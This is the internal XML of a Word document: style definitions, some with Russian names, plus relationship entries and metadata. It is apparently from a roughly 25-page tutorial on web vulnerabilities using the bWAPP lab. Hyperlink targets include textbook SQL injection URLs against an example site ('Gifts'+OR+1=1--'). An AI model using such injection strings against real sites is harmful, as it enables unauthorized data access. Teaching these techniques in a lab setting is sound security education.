    <w:rsid w:val="00BF595C"/>
    <w:rsid w:val="00BF7602"/>
    <w:rsid w:val="00C93297"/>
    <w:rsid w:val="00CB262C"/>
    <w:rsid w:val="00D626E1"/>
    <w:rsid w:val="00D73D41"/>
    <w:rsid w:val="00E14271"/>
    <w:rsid w:val="00EF2E1B"/>
    <w:rsid w:val="00F337B0"/>
    <w:rsid w:val="00FD1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2E4CE"/>
  <w15:docId w15:val="{6920C307-DAF8-4A4E-846D-9CDF792B0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218F"/>
    <w:pPr>
      <w:spacing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42218F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0042218F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine="709"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b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CB262C"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine="709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Light">
    <w:name w:val="Table Grid Light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line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val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42218F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2218F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b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B262C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365F91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a3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pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F9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365F91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365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad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Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af0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1">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af2">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af3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3">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af5"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4844"/>
        <w:tab w:val="right" w:pos="9689"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af5">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af6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7">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af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Pr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af9">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afa">
    <w:name w:val="endnote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концевой сноски Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="afa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afc">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afd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f">
    <w:name w:val="TOC Heading"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff0">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"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link w:val="a3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6">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="a5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StGen0">
    <w:name w:val="StGen0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/>
    </w:tcPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="StGen1">
    <w:name w:val="StGen1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/>
    </w:tcPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="StGen2">
    <w:name w:val="StGen2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/>
    </w:tcPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="StGen3">
    <w:name w:val="StGen3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/>
    </w:tcPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="StGen4">
    <w:name w:val="StGen4"/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cPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:tcPr>
  </w:style>
  <w:style w:type="table" w:styleId="aff1">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing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odecharacter">
    <w:name w:val="Code_character"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="0042218F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:shd w:val="clear" w:color="EEECE1" w:themeColor="background2" w:fill="EEECE1" w:themeFill="background2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Codecharacter"/>
    <w:qFormat/>
    <w:rsid w:val="0042218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EEECE1" w:themeColor="background2" w:fill="EEECE1" w:themeFill="background2"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Imagecharacter">
    <w:name w:val="Image_character"/>
    <w:link w:val="Image"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Image">
    <w:name w:val="Image"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Imagecharacter"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff2">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00187C9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187C9A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0"/>
    <w:rsid w:val="00187C9A"/>
  </w:style>
  <w:style w:type="character" w:styleId="aff3">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A70756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A70756"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-operator">
    <w:name w:val="hljs-operator"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A70756"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A70756"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A70756"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-symbol">
    <w:name w:val="hljs-symbol"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A70756"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-selector-tag">
    <w:name w:val="hljs-selector-tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CB262C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BD08D8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-type">
    <w:name w:val="hljs-type"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BD08D8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attribute">
    <w:name w:val="hljs-attribute"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E14271"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E14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10.png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40.png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20.png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insecure-website.com/products?category=Gifts'+OR+1=1--" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/install.ph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2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insecure-website.com/products?category=Gifts'--" TargetMode="External"/><Relationship Id="rId19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yperlink" Target="https://insecure-website.com/products?category=Gifts" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.itsecgames.com/index.htm.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25</Pages>
  <Words>3534</Words>
  <Characters>20146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</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-21T18:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-12T11:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>